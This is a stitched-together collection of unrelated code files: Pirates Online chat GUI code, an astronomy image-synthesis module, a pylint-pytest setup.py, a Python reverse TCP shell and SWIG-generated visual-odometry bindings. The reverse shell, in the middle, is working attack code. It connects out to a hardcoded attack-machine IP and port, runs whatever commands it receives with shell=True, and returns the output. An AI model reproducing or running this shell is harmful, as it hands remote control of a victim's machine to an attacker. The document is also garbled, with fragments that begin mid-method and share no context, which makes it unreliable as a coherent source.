emoteBg = self.attachNewNode('emoteBg')
skullbg2.find('**/pPlane11').reparentTo(emoteBg)
emoteBg.setScale(scale)
emoteBg.setPos(0.59099999999999997, 0, 0.38)
emoteBg.flattenStrong()
self.chatEntryBackground = self.attachNewNode('chatEntryBackground')
self.chatEntryBackground.setX(-0.90000000000000002)
self.backTabParent = self.chatEntryBackground.attachNewNode('backTabs')
textEntryGeom = self.chatEntryBackground.attachNewNode('textEntryBg')
gui.find('**/pPlane12').reparentTo(textEntryGeom)
textEntryGeom.setScale(scale)
textEntryGeom.setPos(*offset)
textEntryGeom.flattenStrong()
self.chatEntryVisNode = textEntryGeom.attachNewNode('chatEntryVis')
self.chatEntryVisNode.hide()
self.chatEntryVisNode.setAlphaScale(0)
whiteListEntry.reparentTo(self.chatEntryVisNode)
if self.noChat:
def noshow():
pass
whiteListEntry.show = noshow
whiteListEntry.hide()
else:
whiteListEntry.setPos(0.20000000000000001, 0, 0.035999999999999997)
self.frontTabParent = self.chatEntryBackground.attachNewNode('frontTab', sort = 2)
self.speedButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon_over')), geom_scale = 0.25, pos = (0.14000000000000001, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateSpeedChat)
self.emoteButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (charGui.find('**/*head'), charGui.find('**/*head'), charGui.find('**/*head_over')), geom_scale = 0.29999999999999999, pos = (0.049000000000000002, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateEmoteChat)
tGui = loader.loadModel('models/gui/triangle')
triangle = (tGui.find('**/triangle'), tGui.find('**/triangle_down'), tGui.find('**/triangle_over'))
self.startChatButton = DirectButton(parent = self, relief = None, image = triangle, image_scale = 0.065000000000000002, pos = (0.23100000000000001, 0.0, 0.050000000000000003), rolloverSound = None, command = self.chatMgr.activateChat)
self.chatTabs = ChatTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
allTab = self.chatTabs.addTab('All', label = PLocalizer.ChatTabAll, command = self.chatMgr.activateChat, extraArgs = [
'All'])
crewTab = self.chatTabs.addTab('Crew', label = PLocalizer.ChatTabCrew, command = self.chatMgr.activateChat, extraArgs = [
'Crew'])
guildTab = self.chatTabs.addTab('Guild', label = PLocalizer.ChatTabGuild, command = self.chatMgr.activateChat, extraArgs = [
'Guild'])
shipPVPTab = self.chatTabs.addTab('ShipPVP', label = PLocalizer.ChatTabShipPVP, command = self.chatMgr.activateChat, frameSize = (0, 0.23999999999999999, 0.0, 0.10000000000000001), textMayChange = 1, extraArgs = [
'ShipPVP'])
self.chatTabs.stash()
self.whisperTabs = WhisperTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
whisperNameTab = self.whisperTabs.addTab('Name')
whisperCancelTab = self.whisperTabs.addTab('Cancel', command = self.whisperCanceled)
self.whisperTabs.stash()
whisperCancelTab['frameSize'] = (0, 0.105, 0.0, 0.11)
self.whisperPrefixLabel = DirectLabel(parent = whisperNameTab, relief = None, state = DGG.DISABLED, text = PLocalizer.ProfilePageWhisper + ':', text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.033000000000000002, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
DirectLabel(parent = whisperCancelTab, relief = None, state = DGG.DISABLED, text = 'X', text_scale = (self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999), text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.052999999999999999, 0.042999999999999997, 0), text_font = PiratesGlobals.getInterfaceFont())
self.whisperTabs.stash()
self.request('Hidden')
def cleanupGui(self):
self.whisperPrefixLabel = None
self.chatEntryBackground = None
self.backTabParent = None
self.frontTabParent = None
self.speedButton = None
self.emoteButton = None
self.startChatButton = None
if self.chatTabs:
self.chatTabs.destroy()
self.chatTabs = None
if self.whisperTabs:
self.whisperTabs.destroy()
self.whisperTabs = None
def whisperCanceled(self):
self.chatMgr.whisperCanceled()
def refreshTabStates(self):
if self.getCurrentOrNextState() not in ('Off', 'Hidden', 'Whisper'):
if not self.chatMgr.crewChatAllowed:
self.chatTabs.getTab('Crew').stash()
else:
self.chatTabs.getTab('Crew').unstash()
if not self.chatMgr.guildChatAllowed:
self.chatTabs.getTab('Guild').stash()
else:
self.chatTabs.getTab('Guild').unstash()
if not self.chatMgr.shipPVPChatAllowed:
self.chatTabs.getTab('ShipPVP').stash()
else:
self.chatTabs.getTab('ShipPVP').unstash()
def stopSlideIval(self):
if self.slideIval and self.slideIval.isPlaying():
self.slideIval.pause()
def enterHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.setAlphaScale, 0), Func(self.chatEntryVisNode.hide), self.chatEntryBackground.posInterval(0.25, Point3(-0.90000000000000002, 0, 0), blendType = 'easeIn'), Func(self.startChatButton.show), Func(self.chatEntryBackground.hide))
self.slideIval.start()
def exitHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.show), Func(self.chatEntryBackground.show), Func(self.startChatButton.hide), self.chatEntryBackground.posInterval(0.25, Point3(0, 0, 0), blendType = 'easeOut'), Func(self.chatEntryVisNode.setAlphaScale, 1))
self.slideIval.start()
def enterAll(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('All')
self.refreshTabStates()
def exitAll(self):
pass
def enterCrew(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Crew')
self.refreshTabStates()
def exitCrew(self):
pass
def enterGuild(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Guild')
self.refreshTabStates()
def enterShipPVP(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('ShipPVP')
self.refreshTabStates()
def exitShipPVP(self):
pass
def exitGuild(self):
pass
def enterWhisper(self, avatarName = '<NAME>', whisperId = 0):
self.whisperName = avatarName
self.whisperId = whisperId
self.chatTabs.stash()
self.whisperTabs.unstash()
if self.whisperNameLabel:
self.whisperNameLabel.destroy()
self.whisperNameLabel = DirectLabel(parent = self.whisperTabs.getTab('Name'), relief = None, state = DGG.DISABLED, text = avatarName, text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
def exitWhisper(self):
self.whisperName = ''
self.whisperId = 0
if self.whisperNameLabel and 0:
self.whisperNameLabel.destroy()
self.whisperNameLabel = None
| [
"direct.fsm.FSM.FSM.__init__",
"pirates.piratesgui.TabBar.TabBar.stash",
"pirates.piratesbase.PiratesGlobals.getInterfaceFont",
"pirates.piratesgui.TabBar.TopTab.__init__",
"pirates.piratesgui.TabBar.TopTab.destroy"
]
| [((803, 846), 'pirates.piratesgui.TabBar.TopTab.__init__', 'TopTab.__init__', (['self', 'tabBar', 'name'], {}), '(self, tabBar, name, **None)\n', (818, 846), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((1500, 1520), 'pirates.piratesgui.TabBar.TopTab.destroy', 'TopTab.destroy', (['self'], {}), '(self)\n', (1514, 1520), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((2557, 2575), 'pirates.piratesgui.TabBar.TabBar.stash', 'TabBar.stash', (['self'], {}), '(self)\n', (2569, 2575), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((3031, 3074), 'pirates.piratesgui.TabBar.TopTab.__init__', 'TopTab.__init__', (['self', 'tabBar', 'name'], {}), '(self, tabBar, name, **None)\n', (3046, 3074), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((4503, 4532), 'direct.fsm.FSM.FSM.__init__', 'FSM.__init__', (['self', '"""ChatBar"""'], {}), "(self, 'ChatBar')\n", (4515, 4532), False, 'from direct.fsm.FSM import FSM\n'), ((1381, 1414), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (1412, 1414), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((11416, 11449), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (11447, 11449), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((11863, 11896), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (11894, 11896), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((15652, 15685), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (15683, 15685), False, 'from pirates.piratesbase import PiratesGlobals\n')] |
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.misc.fluxes Contains the ObservedImageMaker class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.units import Unit
from astropy import constants
# Import the relevant PTS classes and modules
from ..tools.logging import log
from ..tools import filesystem as fs
from ..basics.filter import Filter
from ...magic.core.image import Image
from ...magic.core.frame import Frame
from ...magic.basics.coordinatesystem import CoordinateSystem
from ..tools.special import remote_filter_convolution, remote_convolution_frame
# -----------------------------------------------------------------
# The speed of light
speed_of_light = constants.c
# -----------------------------------------------------------------
class ObservedImageMaker(object):
"""
This class ...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(ObservedImageMaker, self).__init__()
# -- Attributes --
# The simulation prefix
self.simulation_prefix = None
# The paths to the 'total' FITS files produced by SKIRT
self.fits_paths = None
# The wavelengths of the simulation
self.wavelengths = None
# Filter names
self.filter_names = ["FUV", "NUV", "u", "g", "r", "i", "z", "H", "J", "Ks", "I1", "I2", "I3", "I4", "W1", "W2",
"W3", "W4", "Pacs 70", "Pacs 100", "Pacs 160", "SPIRE 250", "SPIRE 350", "SPIRE 500"]
# The instrument names
self.instrument_names = None
# The filters for which the images should be created
self.filters = dict()
# The dictionary containing the images for various SKIRT output datacubes
self.images = dict()
# The reference WCS
self.wcs = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None, filter_names=None, instrument_names=None, wcs_path=None, kernel_paths=None, unit=None, host_id=None):
"""
This function ...
:param simulation:
:param output_path:
:param filter_names:
:param instrument_names:
:param wcs_path:
:param kernel_paths:
:param unit:
:param host_id:
:return:
"""
# Obtain the paths to the 'total' FITS files created by the simulation
self.fits_paths = simulation.totalfitspaths()
# Get the list of wavelengths for the simulation
self.wavelengths = simulation.wavelengths()
# Get the simulation prefix
self.simulation_prefix = simulation.prefix()
# Set the filter names
if filter_names is not None: self.filter_names = filter_names
# Set the instrument names
self.instrument_names = instrument_names
# Create the filters
self.create_filters()
# Make the observed images
self.make_images(host_id)
# Set the WCS of the created images
if wcs_path is not None: self.set_wcs(wcs_path)
# Convolve the image with a given convolution kernel
if kernel_paths is not None:
# Check whether the WCS for the image is defined. If not, show a warning and skip the convolution
if wcs_path is None: log.warning("WCS of the image is not defined, so convolution cannot be performed (the pixelscale is undefined)")
else: self.convolve(kernel_paths, host_id)
# Convert the units (WCS has to be loaded!)
if unit is not None: self.convert_units(unit)
# Write the results
if output_path is not None: self.write(output_path)
# -----------------------------------------------------------------
def create_filters(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Constructing the filter objects ...")
# Loop over the different filter names
for filter_name in self.filter_names:
# Debugging
log.debug("Constructing the " + filter_name + " filter ...")
# Create the filter
fltr = Filter.from_string(filter_name)
# Add the filter to the list
self.filters[filter_name] = fltr
# -----------------------------------------------------------------
def make_images(self, host_id=None):
"""
This function ...
:param host_id:
:return:
"""
# Inform the user
log.info("Making the observed images (this may take a while) ...")
# Loop over the different simulated images
for path in self.fits_paths:
# Get the name of the instrument
instr_name = instrument_name(path, self.simulation_prefix)
            # If a list of instruments is defined and this instrument is not in that list, skip it
if self.instrument_names is not None and instr_name not in self.instrument_names: continue
# Get the name of the datacube (as given by SKIRT)
datacube_name = fs.strip_extension(fs.name(path))
# Debugging
log.debug("Making the observed images for " + datacube_name + ".fits ...")
# Create a dictionary to contain the observed images for this FITS file
images = dict()
# The filter convolution is performed remotely
if host_id is not None:
# Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names)
frames = remote_filter_convolution(host_id, path, self.wavelengths, self.filters)
# Add the resulting image frames to the dictionary
for filter_name in frames:
# Add the observed image to the dictionary
images[filter_name] = frames[filter_name]
# The calculation is performed locally
else:
# Load the simulated image
datacube = Image.from_file(path, always_call_first_primary=False)
# Convert the frames from neutral surface brightness to wavelength surface brightness
for l in range(len(self.wavelengths)):
# Get the wavelength
wavelength = self.wavelengths[l]
# Determine the name of the frame in the datacube
frame_name = "frame" + str(l)
# Divide this frame by the wavelength in micron
datacube.frames[frame_name] /= wavelength
# Set the new unit
datacube.frames[frame_name].unit = "W / (m2 * arcsec2 * micron)"
# Convert the datacube to a numpy array where wavelength is the third dimension
fluxdensities = datacube.asarray()
# Loop over the different filters
for filter_name in self.filters:
fltr = self.filters[filter_name]
# Debugging
log.debug("Making the observed image for the " + str(fltr) + " filter ...")
# Calculate the observed image frame
data = fltr.convolve(self.wavelengths, fluxdensities)
frame = Frame(data)
# Set the unit of the frame
frame.unit = "W/(m2 * arcsec2 * micron)"
# Add the observed image to the dictionary
images[filter_name] = frame
# Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key)
self.images[datacube_name] = images
# -----------------------------------------------------------------
def set_wcs(self, wcs_path):
"""
This function ...
:param wcs_path:
:return:
"""
# TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images)
# Inform the user
log.info("Setting the WCS of the simulated images ...")
# Debugging
log.debug("Loading the coordinate system from '" + wcs_path + "' ...")
# Load the WCS
self.wcs = CoordinateSystem.from_file(wcs_path)
# Loop over the different images and set the WCS
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Setting the coordinate system of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Set the coordinate system for this frame
self.images[datacube_name][filter_name].wcs = self.wcs
# -----------------------------------------------------------------
def convolve(self, kernel_paths, host_id=None):
"""
This function ...
:param kernel_paths:
:param host_id:
:return:
"""
# Inform the user
log.info("Convolving the images ...")
# If the convolutions must be performed remotely
if host_id is not None:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Determine the kernel path for this image
kernel_path = kernel_paths[filter_name]
# Perform the remote convolution
self.images[datacube_name][filter_name] = remote_convolution_frame(self.images[datacube_name][filter_name], kernel_path, host_id)
# The convolution is performed locally
else:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Load the kernel
kernel = Frame.from_file(kernel_paths[filter_name])
# Debugging
log.debug("Convolving the '" + filter_name + "' image of the '" + datacube_name + "' instrument ...")
# Convolve this image frame
self.images[datacube_name][filter_name].convolve(kernel)
# -----------------------------------------------------------------
def convert_units(self, unit):
"""
This function ...
:param self:
:param unit:
:return:
"""
# TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr
# 1 Jy = 1e-26 * W / (m2 * Hz)
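        # For reference, the reasoning behind the factor assembled step by step below:
        # for a filter with pivot wavelength lambda_p,
        #   F_nu [W / (m2 * arcsec2 * Hz)] = F_lambda [W / (m2 * arcsec2 * micron)] * lambda_p**2 / c
        # and 1 MJy/sr = 1e6 * 1e-26 W / (m2 * Hz * sr), so the full conversion factor is
        #   (lambda_p**2 / c) * 1e26 * 1e-6 * (sr / arcsec2)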
# Inform the user
log.info("Converting the units of the images to " + str(unit) + " ...")
# Get the pixelscale
#pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Converting the unit of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Get the pivot wavelength of the filter
fltr = self.filters[filter_name]
pivot = fltr.pivotwavelength() * Unit("micron")
# Determine the conversion factor
conversion_factor = 1.0
# From surface brightness to flux density (no)
#conversion_factor *=
# From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz)
conversion_factor *= (pivot ** 2 / speed_of_light).to("micron/Hz").value
# From W / (m2 * arcsec2 * Hz) to MJy / sr
#conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("")
conversion_factor *= 1e26 * 1e-6 * (Unit("sr") / Unit("arcsec2")).to("")
# Convert
self.images[datacube_name][filter_name] *= conversion_factor
self.images[datacube_name][filter_name].unit = "MJy/sr"
# -----------------------------------------------------------------
def write(self, output_path):
"""
This function ...
:param output_path:
:return:
"""
# Inform the user
log.info("Writing the images ...")
# Loop over the different images (self.images is a nested dictionary of dictionaries)
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Determine the path to the output FITS file
path = fs.join(output_path, datacube_name + "__" + filter_name + ".fits")
# Save the image
self.images[datacube_name][filter_name].save(path)
# -----------------------------------------------------------------
def instrument_name(datacube_path, prefix):
"""
This function ...
:param datacube_path:
:param prefix:
:return:
"""
return fs.name(datacube_path).split("_total.fits")[0].split(prefix + "_")[1]
# -----------------------------------------------------------------
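# A minimal usage sketch, assuming `simulation` is a SKIRT simulation object exposing
# totalfitspaths(), wavelengths() and prefix(), exactly as used by run() above
# (the paths and filter names are placeholders):
#
#   maker = ObservedImageMaker()
#   maker.run(simulation, output_path="observed", filter_names=["FUV", "NUV", "SPIRE 250"],
#             wcs_path="reference_wcs.fits")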
| [
"astropy.units.Unit"
]
| [((12455, 12469), 'astropy.units.Unit', 'Unit', (['"""micron"""'], {}), "('micron')\n", (12459, 12469), False, 'from astropy.units import Unit\n'), ((13037, 13047), 'astropy.units.Unit', 'Unit', (['"""sr"""'], {}), "('sr')\n", (13041, 13047), False, 'from astropy.units import Unit\n'), ((13050, 13065), 'astropy.units.Unit', 'Unit', (['"""arcsec2"""'], {}), "('arcsec2')\n", (13054, 13065), False, 'from astropy.units import Unit\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md')) as fin:
long_description = fin.read()
setup(
name='pylint-pytest',
version='1.0.3',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
license='MIT',
url='https://github.com/reverbc/pylint-pytest',
description='A Pylint plugin to suppress pytest-related false positives.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests', 'sandbox']),
install_requires=[
'pylint',
'pytest>=4.6',
],
python_requires='>=3.6',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
tests_require=['pytest', 'pylint'],
keywords=['pylint', 'pytest', 'plugin'],
)
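# Typical usage once installed, assuming the importable module is named `pylint_pytest`
# (check the project README): pylint --load-plugins pylint_pytest <your_package>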
| [
"os.path.dirname",
"setuptools.find_packages",
"os.path.join"
]
| [((133, 155), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (145, 155), False, 'from os import path\n'), ((167, 195), 'os.path.join', 'path.join', (['here', '"""README.md"""'], {}), "(here, 'README.md')\n", (176, 195), False, 'from os import path\n'), ((654, 697), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['tests', 'sandbox']"}), "(exclude=['tests', 'sandbox'])\n", (667, 697), False, 'from setuptools import setup, find_packages\n')] |
# Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments
# Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore
#=========================================================================================================================================
# Python TCP Client
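# Example setup: start a listener on the attack machine first, e.g. with netcat (`nc -lvp 5000`),
# then run this script on the target so it connects back to that listener.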
import socket
import subprocess
#Start client function
def startClient():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create the socket object 'sock'
    sock.connect(('192.168.1.95', 5000))                  # Replace with the IP and listening port of your attack machine
while True: # start an infinite loop
        sentCommand = sock.recv(1024)                     # read up to 1 KB from the TCP socket
        if 'terminate' in sentCommand:                    # if we receive a terminate string from the attack machine, close the socket and end the loop
sock.close()
break
else: # or else, the sent command gets sent to the victim shell process
CMD = subprocess.Popen(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
sock.send( CMD.stdout.read() ) # return shell result
sock.send( CMD.stderr.read() ) # return any shell errors
#Main function
def main ():
startClient()
#Program entry point
main()
| [
"subprocess.Popen",
"socket.socket"
]
| [((420, 469), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (433, 469), False, 'import socket\n'), ((1233, 1350), 'subprocess.Popen', 'subprocess.Popen', (['sentCommand'], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'stdin': 'subprocess.PIPE'}), '(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=\n subprocess.PIPE, stdin=subprocess.PIPE)\n', (1249, 1350), False, 'import subprocess\n')] |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.12
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_viso2')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
return importlib.import_module('_viso2')
_viso2 = swig_import_helper()
del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_viso2', [dirname(__file__)])
except ImportError:
import _viso2
return _viso2
try:
_mod = imp.load_module('_viso2', fp, pathname, description)
finally:
if fp is not None:
fp.close()
return _mod
_viso2 = swig_import_helper()
del swig_import_helper
else:
import _viso2
del _swig_python_version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class SwigPyIterator(_object):
"""Proxy of C++ swig::SwigPyIterator class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_SwigPyIterator
__del__ = lambda self: None
def value(self):
"""value(self) -> PyObject *"""
return _viso2.SwigPyIterator_value(self)
def incr(self, n=1):
"""
incr(self, n=1) -> SwigPyIterator
incr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_incr(self, n)
def decr(self, n=1):
"""
decr(self, n=1) -> SwigPyIterator
decr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_decr(self, n)
def distance(self, x):
"""distance(self, x) -> ptrdiff_t"""
return _viso2.SwigPyIterator_distance(self, x)
def equal(self, x):
"""equal(self, x) -> bool"""
return _viso2.SwigPyIterator_equal(self, x)
def copy(self):
"""copy(self) -> SwigPyIterator"""
return _viso2.SwigPyIterator_copy(self)
def next(self):
"""next(self) -> PyObject *"""
return _viso2.SwigPyIterator_next(self)
def __next__(self):
"""__next__(self) -> PyObject *"""
return _viso2.SwigPyIterator___next__(self)
def previous(self):
"""previous(self) -> PyObject *"""
return _viso2.SwigPyIterator_previous(self)
def advance(self, n):
"""advance(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator_advance(self, n)
def __eq__(self, x):
"""__eq__(self, x) -> bool"""
return _viso2.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
"""__ne__(self, x) -> bool"""
return _viso2.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
"""__iadd__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
"""__isub__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___isub__(self, n)
def __add__(self, n):
"""__add__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
"""
__sub__(self, n) -> SwigPyIterator
__sub__(self, x) -> ptrdiff_t
"""
return _viso2.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
SwigPyIterator_swigregister = _viso2.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
class VisualOdometry(_object):
"""Proxy of C++ VisualOdometry class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometry, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometry, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_VisualOdometry
__del__ = lambda self: None
def process(self, p_matched_):
"""process(self, p_matched_) -> bool"""
return _viso2.VisualOdometry_process(self, p_matched_)
def getMotion(self):
"""getMotion(self) -> Matrix"""
return _viso2.VisualOdometry_getMotion(self)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.VisualOdometry_getMatches(self)
def getNumberOfMatches(self):
"""getNumberOfMatches(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfMatches(self)
def getNumberOfInliers(self):
"""getNumberOfInliers(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfInliers(self)
def getInlierIndices(self):
"""getInlierIndices(self) -> std::vector< int32_t,std::allocator< int32_t > >"""
return _viso2.VisualOdometry_getInlierIndices(self)
def getGain(self, inliers_):
"""getGain(self, inliers_) -> float"""
return _viso2.VisualOdometry_getGain(self, inliers_)
VisualOdometry_swigregister = _viso2.VisualOdometry_swigregister
VisualOdometry_swigregister(VisualOdometry)
class calibration(_object):
"""Proxy of C++ VisualOdometry::calibration class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, calibration, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, calibration, name)
__repr__ = _swig_repr
__swig_setmethods__["f"] = _viso2.calibration_f_set
__swig_getmethods__["f"] = _viso2.calibration_f_get
if _newclass:
f = _swig_property(_viso2.calibration_f_get, _viso2.calibration_f_set)
__swig_setmethods__["cu"] = _viso2.calibration_cu_set
__swig_getmethods__["cu"] = _viso2.calibration_cu_get
if _newclass:
cu = _swig_property(_viso2.calibration_cu_get, _viso2.calibration_cu_set)
__swig_setmethods__["cv"] = _viso2.calibration_cv_set
__swig_getmethods__["cv"] = _viso2.calibration_cv_get
if _newclass:
cv = _swig_property(_viso2.calibration_cv_get, _viso2.calibration_cv_set)
def __init__(self):
"""__init__(self) -> calibration"""
this = _viso2.new_calibration()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_calibration
__del__ = lambda self: None
calibration_swigregister = _viso2.calibration_swigregister
calibration_swigregister(calibration)
class bucketing(_object):
"""Proxy of C++ VisualOdometry::bucketing class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, bucketing, name, value)
__swig_getmethods__ = {}
